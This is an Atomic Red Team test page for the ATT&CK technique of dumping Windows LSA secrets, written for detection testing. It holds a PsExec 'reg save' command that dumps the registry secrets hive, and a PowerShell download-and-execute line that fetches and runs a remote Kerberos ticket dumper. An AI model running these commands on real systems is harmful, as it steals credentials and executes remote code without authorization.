atomic-red-team/atomics/T1003.004/T1003.004.md

# T1003.004 - OS Credential Dumping: LSA Secrets
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
<blockquote>

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)

[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Dumping LSA Secrets](#atomic-test-1---dumping-lsa-secrets)

- [Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1](#atomic-test-2---dump-kerberos-tickets-from-lsa-using-dumperps1)


<br/>

## Atomic Test #1 - Dumping LSA Secrets
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.

**Supported Platforms:** Windows


**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_exe | Path to PsExec executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1003.004&#92;bin&#92;PsExec.exe|


#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
```

#### Cleanup Commands:
```cmd
del %temp%\secrets >nul 2> nul
```



#### Dependencies:  Run with `powershell`!
##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{psexec_exe}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PSTools" -Force
New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe" "#{psexec_exe}" -Force
```




<br/>
<br/>

## Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1
This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
Ref: https://github.com/MzHmO/PowershellKerberos/
Author of dumper.ps1: Michael Zhmaylo (@MzHmO)

**Supported Platforms:** Windows


**auto_generated_guid:** 2dfa3bff-9a27-46db-ab75-7faefdaca732






#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')
```






<br/>